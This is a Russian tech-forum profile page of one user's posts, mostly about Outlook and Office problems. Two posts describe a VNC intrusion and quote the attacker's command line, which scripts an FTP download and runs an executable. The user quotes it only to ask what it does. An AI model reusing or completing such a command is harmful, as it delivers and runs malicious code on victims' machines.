Перейти к содержанию
СофтФорум - всё о компьютерах и не только

Серж_де_Круасан

Новички
  • Постов

    8
  • Зарегистрирован

  • Посещение

Информация о Серж_де_Круасан

Достижения Серж_де_Круасан

0

Репутация

  1. Привет друзья! Такая проблемка нарисовалась у моего коллеги. Хотя для начала инфо о системе: Windows XP SP2, Office XP. Ну так вот, прикол в том, что когда пытаемся написать новое письмо в Outlook, то когда курсор находится на поле ввода адреса, не переключается языковая раскладка. Стоит мёртво на RU. В поле текста всё переключается. И кстати в Word и Excel тоже всё прекрасно переключается. Но вот ввести в Outlooke адрес, естественно латинскими буквами, никак не даёт зараза! Что я только ни делал, и в Regional Settings перепробовал кучу вариантов, и в настройках Outlook всё излазил, ну никак не могу я найти лекарства от этого глюка. Может кто подскажет что это может быть? Я написал эту тему сюда, т. к. не уверен что это проблема с Outlook. Может это Office кривой?
  2. Спасибо за ответ. Я пожалуй поясню как всё это случилось. Вчера во время общения в чате Skype, я вдруг обнаруживаю, что в окне написания текста быстренько пишутся какие-то символы и отправляются моему собеседнику по чату. Увидев это, я просто обалдел. Всё это случилось прямо у меня на глазах. Первая мысль была - клава глюканула. Но вскоре я заподозрил что дело тут нечистое. Попахивает хаком. А символы написались вот такие: сьв щае Юл ?усрщ л ?аез -т -м -ыЖшл ?вуд шл ?чюучу ?учше Я попробовал перевести это в латинскую раскладку, и начало вырисовываться что-то похожее на команды. Про них я и спрашивал тут выше. Я офигел. Правда не понятно почему они впихнулись в Скайп, да ещё в таком виде. И тут совсем вскоре у меня вдруг открывается чёрное окно (cmd), и там начинают печататься опять команды, но уже как надо - латиницей. Тут я 100% чухнул, что комп взломали, что подтверждала чёрная иконка VNC (она чёрнеет когда контроль над компом имеет удалённый юзер). Я срочно его обрубил. Доступ к VNC был запоролен, но они его взломали видимо. Теперь придётся как-то ужесточать всё это дело. А VNC стоит у меня для того, чтобы я мог из дома работать на рабочем компе. Я потом проверил комп на вирусы и прочую нечисть, вроде всё чисто. Надеюсь обошлось. Но вот интересно всё-таки, что они пытались запустить, или запустили, засранцы эти.
  3. Товарищи! Подскажите пожалуйста, какой эффект даст запуск в cmd вот такой строки: oft >k&echo k&ftp -n -v -s:ik &del ik&x>exe&exit Что это? Какой смысл тут заложен? Надеюсь я в правильную тему это написал. Очень надеюсь на ответ. Очень нужно. Тут кое-кто на моём компе пытался это сотворить. Чувствую что это какая-то гадость
  4. А не пробовал поработать с: TOOLS > Rules and alerts? Там можно задавать правила обработки мейлов, т. е. что куда бросать, что куда переправлять, что где стирать, и т. п.. Я например пользуюсь, очень полезная штука.
  5. Всё, докопался я наконец, что новички, которые имеют до 20 постов, не могут менять репутацию. Вот так :) Так что, пока что просто СПАСИБО! :)
  6. Да не, я бы ткнул с удовольствием, и в FAQ говорится про какой-то плюсик, только я его не вижу этого плюсика :). Возле цифры твоей репутации нет ни плюсиков, ни минусиков. Хм....
  7. Спасибо! Получилось. Я убрал внизу все ярлычки кроме почты, при этом всё лишнее в списке папок пропало. А потом я восстановил нужные ярлычки (Notes, Contacts), и при этом та "муть" в списке папок не восстановилась. Что и требовалось. :) Хочу поставить тебе плюсик, но не знаю как. Читал FAQ, но не помогло Как это сделать?
  8. Здравствуйте товарищи! Подскажите пожалуйста вот какую штуку. Можно ли в Outlook 2003, там где список папок (Folder list), убрать оттуда ненужные мне папки: Journal, Contacts, Calendar, Notes, Tasks. :) сли что и нужно из этого, я могу сделать (и уже сделал) соответствующие ярлычки под этим списком. Но а в списке папок они мне не нужны, мешаются среди нужных Inbox, Sent, Draft. Искал как убрать их, но безрезультатно, нигде в настройках я такого не нашёл :)
×
×
  • Создать...